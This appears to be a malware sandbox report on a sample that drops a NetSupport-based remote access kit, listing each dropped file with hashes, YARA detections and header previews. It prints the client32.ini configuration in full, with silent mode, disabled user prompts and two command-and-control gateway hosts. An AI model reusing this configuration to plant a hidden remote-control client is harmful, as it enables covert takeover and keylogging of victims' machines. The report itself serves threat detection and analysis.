SHA-512:	4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Jjv9ha2GKn.exe, Detection: malicious, Browse Filename: 5q1Wm5VlqL.exe, Detection: malicious, Browse Filename: KC0uZWwr8p.exe, Detection: malicious, Browse Filename: KC0uZWwr8p.exe, Detection: malicious, Browse Filename: hkpqXovZtS.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........in.:n.:n.:g.6:\|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.754723001562745
Encrypted:	false
SSDEEP:	6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
MD5:	2D3B207C8A48148296156E5725426C7F
SHA1:	AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256:	EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512:	55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\NSM.LIC

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	259
Entropy (8bit):	5.058986594877512
Encrypted:	false
SSDEEP:	6:O/oP54xRPjwxVshvydDKHMoEEjLgpW2MWMf651XZNWYpPM/iooZa8l6i7s:X0R7wxQJjjqW2MWMf65TNBPM/io98l6J
MD5:	1DC87146379E5E3F85FD23B25889AE2A
SHA1:	B750C56C757AD430C9421803649ACF9ACD15A860
SHA-256:	F7D80E323E7D0ED1E3DDD9B5DF08AF23DCECB47A3E289314134D4B76B3ADCAF2
SHA-512:	7861ABE50EEFDF4452E4BAACC4B788895610196B387B70DDEAB7BC70735391ED0A015F47EADA94A368B82F8E5CEDB5A2096E624F4A881FF067937AD159E3562C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1200..0xdb3e38e....; NetSupport License File...; Generated on 00:48 - 19/03/2014........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=MGJFFRT466..maxslaves=100000..os2=1..product=10..serial_no=NSM301071..shrink_wrap=0..transport=0..

C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.22028391196942
Encrypted:	false
SSDEEP:	192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
MD5:	A0B9388C5F18E27266A31F8C5765B263
SHA1:	906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256:	313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512:	6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\PCICL32.DLL

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3710280
Entropy (8bit):	6.518204410536431
Encrypted:	false
SSDEEP:	49152:xOHDe5Yr6tYA4S+DjdwfwBTNZaZQclSpmTIH:xOHDe5YrvS+tBQSEm
MD5:	AD51946B1659ED61B76FF4E599E36683
SHA1:	DFE2439424886E8ACF9FA3FFDE6CAAF7BFDD583E
SHA-256:	07A191254362664B3993479A277199F7EA5EE723B6C25803914EEDB50250ACF4
SHA-512:	6C30E7793F69508F6D9AA6EDCEC6930BA361628EF597E32C218E15D80586F5A86D89FCBEE63A35EAB7B1E0AE26277512F4C1A03DF7912F9B7FF9A9A858CF3962
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.\|.....................Rich............PE..L.....U...........!.......... ......].......................................09......9...............................................................8.H.....7.d...................................`...@....................w..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................p..............@....hhshare.............r..............@....rsrc................t..............@..@.reloc...,....7......V6.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	391832
Entropy (8bit):	6.788660116314725
Encrypted:	false
SSDEEP:	6144:/0pwbUb486Yu0LIFZf4TktH4aY384az44lstAZPVJ4hPueU12jXvbJaS0T9XjJpX:8pwbUb48Ju0LIFZf4Tk2aY3FasNAZtJp
MD5:	405A7BCA024D33D7D6464129C1B58451
SHA1:	22B64E211D96D773C510AC82E7A73F8DEBF4E4CD
SHA-256:	092C3EC01883D3B4B131985B3971F7E2E523252B75F9C2470E0821505C4A3A83
SHA-512:	3C8D4CBF377A8BEB793C93B63D521CCD75167DEC02DA43BB91434CB6B0737CA2D61FA201F2825FD1A0CEAAE768BB53D78F737E7C412AAE83D3CDC748893F31E6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...;..U...........!......................................................................@.............................o...T...x....0..8....................@..`E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............\|..............@....rsrc...8....0......................@..@.reloc..&F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\client32.exe

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55456
Entropy (8bit):	3.9089814840046824
Encrypted:	false
SSDEEP:	1536:HtvrImfzoXK6DDvvvDvpvZMt+pan/opgRl2:lImfzoXK9/o66
MD5:	9497AECE91E1CCC495CA26AE284600B9
SHA1:	A005D8CE0C1EA8901C1B4EA86C40F4925BD2C6DA
SHA-256:	1B63F83F06DBD9125A6983A36E0DBD64026BB4F535E97C5DF67C1563D91EFF89
SHA-512:	4C892E5029A707BCF73B85AC110D8078CB273632B68637E9B296A7474AB0202320FF24CF6206DE04AF08ABF087654B0D80CBECFAE824C06616C47CE93F0929C9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\client32.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L....Y.K............................ ........ ....@..................................'.......................................0..<....@...r..........P...P............ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc....r...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\client32.ini

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	637
Entropy (8bit):	5.387596614765334
Encrypted:	false
SSDEEP:	12:pWqH+ZbsGSyLBa/vpVSXCxOZ7CCPfu82kJCYublu/fqILA:0qe6U8zxOLrVzusfpc
MD5:	5274A126EE2F7F926FB8F9AC53A57ABD
SHA1:	10EEB6DBD99013C7969C27D09104FCB0FFBD97DA
SHA-256:	B3F198F6976B2A97A0AAFD4127BF1A274C3CA388226DE13DA37F3B5976B439CA
SHA-512:	FCF0B3C57BD2DB6544274CB622C4855E915C74705C311E3F94749A401238EBF525FB4C9607528DEDB9944B8C682A3DA2E4BCDD9A0E6D7367241430E54AB290DB
Malicious:	false
Preview:	0x822315b....[Client].._present=1..DisableChatMenu=1..DisableDisconnect=1..DisableReplayMenu=1..SecurityKey2=dgAAAMMIrHFRU0tiSzaaF9m1asQA..Protocols=3..Shared=1..ValidAddresses.TCP=..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SOS_RShift=0..DisableChat=1..SysTray=0..UnloadMirrorOnDisconnect=0..AutoICFConfig=1..Usernames=....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\NetSups\client32u.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=ganeres1.com:3785..Port=3785..GSK=EM;A@JFA:D>D@EBIFK:N@FDF..SecondaryGateway=ganeres2.com:3785..SecondaryPort=3785..

C:\Users\user\AppData\Local\DNScache\msauserext.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.268518137985743
Encrypted:	false
SSDEEP:	384:Mn/g+juoejt267oVz36sV+Vxclf0d3gZwcWCzOW:g1Ac1WgZwQz
MD5:	C4029309233F46F89C99EECA439B279F
SHA1:	07D9A61ADD09A241ABF04AA03D727C78A2CB9932
SHA-256:	AD1712FD9634521ADF14DF34D49234B87731BA87D347F5D1A7E08F356531AD67
SHA-512:	25E76D3D52B8F1B2F597B70297541A06B4E6809EF76B8E27EDE657013FB4634A57DF86289C19EF4F113CC99D738EF2B2DC69F61B9AA44C16BCAFBBD4DF3FB62C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e...6...6...6..M6...6...7...6...7...6...6...6...7...6...7...6...7...6...7...6..!6...6...7...6Rich...6........PE..L......]...........!.....0..........`1.......@............................................@A.........................:.......P.......p.......................... .......T............................................P......4:..@....................text...3........0.................. ..`.data........@.......4..............@....idata.......P.......6..............@..@.didat.......`.......>..............@....rsrc........p.......@..............@..@.reloc.. ............F..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\mscat32.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	4.958216172325469
Encrypted:	false
SSDEEP:	192:6W3M4nhhiMUBcky6BY6iyREGa2XsA9EcMZE6f4mg9cT/55Sk4QW3iWwS:thhiMUBY6K6UZxNW3iWN
MD5:	E1E14A4208F014B12732E596AF8B497B
SHA1:	977EDCB5E3BBB964C41466D678FB122B02BC372E
SHA-256:	3044365184CFBFBA62EC55C013D66B1CD8A7F5BCBAAA1E68D58F998FE5A27B44
SHA-512:	99CEEF8A160D1E06726F683951C1CBC5637CA39AC62F938A3F7823192A11E42676717EB65F25DC438208C01D1812A0436040BCF27D9173EDF6581F89F620FEE0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........j..j..j...N..j.....j.....j..j..j.....j.....j.....j..."..j.....j.Rich.j.................PE..L......[...........!................p........0.....`.........................p............@A......................... .......@.......P.. ....................`..h.......T............................................@...............................text............................... ..`.data...L....0......................@....idata..H....@......................@..@.rsrc... ....P.......&..............@..@.reloc..h....`.......,..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.560525784264512
Encrypted:	false
SSDEEP:	24:eH1GSYWciw1lL/ReD5uIZW072wmgNuKpB35WWdPPYPNy:yYQGLRwcIZWINuyx5WwHg
MD5:	8C3A464EE6AA2B5AA573564D9BD6541D
SHA1:	4868CAC6E7C788BFD736A696F633D8CFD7A620EC
SHA-256:	E5CA3F9B9833184C35AD89F615BF7A5108B7721D685A795CE4019C3D2609FDE6
SHA-512:	71E97D0BE449D9BC423AD253E11AD848BAFFD70B60AD20240224BF04DCA279BAF4ECEC9AD65B72C487715F5A109ECF9EAD6528D758B5696970204953CB9EE5FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L...k`c............!.........................................................0......k.....@.......................................... .. ...............................8............................................................................text...............................@..@.rsrc... .... ......................@..@....k`c.........T...8...8.......k`c.........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02.... ....,v..Y..b....,1... yU=8Vh)k`c.........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.455474829818716
Encrypted:	false
SSDEEP:	384:8gRP+xeEPR4l8fxjL9+EM/ko5V5HWLpW:8u+xFPR4lqx0RfO
MD5:	0DD075E74F248AEBC50F5A2DCB5BF42B
SHA1:	857FD626A19ED5EB99155D71DC2C4293D1A2DF0C
SHA-256:	432B1BF04B68942BD54A8DFCE2799D733881351AC9B1FF2F0C4D2EF49F8C3613
SHA-512:	9866AF509EF3EE42093BDE90847CA6A8D7B9BFFA5C38474AF16F815689328229B4F21C33A2535A4F86F671B35902668E76CD8E636CD5E726CD5B31D9226B8401
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.b.q...q...q...e...p...e...}...q...\...e...v...e...p...e...r...e..p...e...p...Richq...........PE..L....=.L...........!.....$...4.......+.......@............................................@A........................ 3.......p..P...............................L... ...T............................................p...............................text....#.......$.................. ..`.data....$...@.......(..............@....idata..l....p.......*..............@..@.rsrc................0..............@..@.reloc..L............6..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21384
Entropy (8bit):	6.505465569400541
Encrypted:	false
SSDEEP:	384:90DT4KNMJFJwjp3/rWcW5gWsHb914gHRN7+X7aJdlGsG:Cw0MnJc3GUbjQ7aJG
MD5:	93FD1AFD72BC414788B8422508F69101
SHA1:	1E2FCF6B1B1005C7A8E04F3AE18065FB57CBCEB2
SHA-256:	8DB18F6CB26D179EE5374DA687A9FDDFCB0B3B2A99346FEAA95844C830BDA606
SHA-512:	9A3725D7AEA385DDA331CD569C8B4BE953761E406729F04D4872B3C0EB914B993AD521AD2963C74D59ACE0CEC547E1D20AE18E278FE9A743009D10F9DC838EC1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........n.`.=.`.=.`.=...<.`.=..1=.`.=...<.`.=...<.`.=.`.=.`.=...<.`.=...<.`.=...<.`.=..]=.`.=...<.`.=Rich.`.=........................PE..L....L.`.........."!................ ........0...............................p......~\|....@A.........................*..J....@..x....P...............0...#...`..t...X...8...............................@............@...............................text............................... ..`.data...0....0....... ..............@....idata.......@......."..............@..@.rsrc........P.......(..............@..@.reloc..t....`.......,..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18832
Entropy (8bit):	6.4434700117269585
Encrypted:	false
SSDEEP:	384:tKDL6r3uJBAjEOTWikEWEZ1e14gHRN7NslXFTnh:Aa3urdT8GNmt
MD5:	0AB5BACD140CB2A1014A2EF49E56A770
SHA1:	CE60ADF0EF64B3C0B69F4EC69A7BEA855E448D57
SHA-256:	DE699589DB52A7E952B3F2DF186E346B1A68E7AD9F6DC38C390D4A1CEB99FEAC
SHA-512:	025B5301320000DCB09EECB4D0B20CC0F991121A4CCC911A88BDE4D83387FC995A84FE7B7E88907A38AEFA9B35B67C29390220743DC193CD938C45D6F798B390
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mm[............v~.......t..............uz......uz......uz......uz......uz......uz......uz......Rich............PE..L....L.`.........."!.........................0...............................p............@A........................0"../...p@..P....P..0............&...#...`..L...D...8...............................@............@..h............................text..._........................... ..`.data........0......................@....idata..x....@......................@..@.rsrc...0....P......................@..@.reloc..L....`.......$..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\msvcr100.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\neth.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8002329163397075
Encrypted:	false
SSDEEP:	24:eH1GSZhLcgqbzC2tACIZW098CQNuv2S435WWdPPYPNyDjrsC:yTLcg12tVIZWO8tulG5WwHgwrs
MD5:	84F50C4ACD6A1DEE845DD5B9E9CBFDED
SHA1:	337E4B5AE8060F43BBA726E823C6039FB422661C
SHA-256:	2E225340E39ABAA2458585573E63E5A54D75228D13B8AF6FBE608CC0D0C15378
SHA-512:	573EA97C9DBAE14722902E306D0F88AB54CB9E015F59DA69B680D8075F0E6BD186B99FE7FAAA4EE697C051F4CFA9D583E2AEBAD409D5715FB1465D13C7380050
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L.....p...........!..............................`D.........................0............@.......................................... ..................................8............................................................................text...............................@..@.rsrc........ ......................@..@......p........T...8...8.........p........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02.... .....!.qf.\|.I.?.z!t...$8.It..t...p........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\netmsg.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.80282468887158
Encrypted:	false
SSDEEP:	24:eH1GSPEcpcgKEOlxmM87C2tACIZW0s8A8YNu49hZ35WWdPPYPNyydsC:ybpcgc8O2tVIZWv8ADu4hJ5WwHgFds
MD5:	4FCF8ECBD47D01828AA075D9F25DC681
SHA1:	1AC5DCD81C3435B41E29F5C564F1D52A1511C69D
SHA-256:	2FC489C36E823CDD45A250DC7C9306B8C2A73819D1D054AEAB63FF4E113A8760
SHA-512:	952F256D05E23B4D6772B6304F0AA3FB2F7D959C06546937DE7CD62631ACE2CF8110BCF61A448A51974E58C44D6FAE83C942F8F0535F68A6488AE1DAC44730E4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L.....N............!..............................XD.........................0......~\....@.......................................... ..................................8............................................................................text...............................@..@.rsrc........ ......................@..@......N.........T...8...8.........N.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02.... ...1.V..r?...`.\P....{2.<..~...N.........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\nskbfltr.inf

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\Users\user\AppData\Local\DNScache\nsm_vpro.ini

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\Users\user\AppData\Local\DNScache\pcicapi.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.737780491933496
Encrypted:	false
SSDEEP:	768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:	DCDE2248D19C778A41AA165866DD52D0
SHA1:	7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:	9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:	C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\pcicapi.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DNScache\remcmdstub.exe

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63320
Entropy (8bit):	6.439464682558898
Encrypted:	false
SSDEEP:	1536:bJfanvXuN86jJ9hUHYBlXUYwT24a+yVwQ:lanPGjJTU4IYia+yVX
MD5:	35DA3B727567FAB0C7C8426F1261C7F5
SHA1:	B71557D67BCD427EF928EFCE7B6A6529226415E6
SHA-256:	89027F1449BE9BA1E56DD82D13A947CB3CA319ADFE9782F4874FBDC26DC59D09
SHA-512:	14EDADCEECEB95F5C21FD3A0A349DD2A312D1965268610D6A6067049F34E3577FC96F6BA37B1D6AB8CE21444208C462FA97FAB24BBCD77059BC819E12C5EFC5A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(T-.I:~.I:~.I:~..~.I:~.1.~.I:~.I;~.I:~..~.I:~..~.I:~..~.I:~..~.I:~Rich.I:~........PE..L.....(Y.....................J.......!............@.......................... .......D....@....................................<.......T...............X'..............................................@...............@............................text............................... ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\2nd2_3[1].zip

Download File

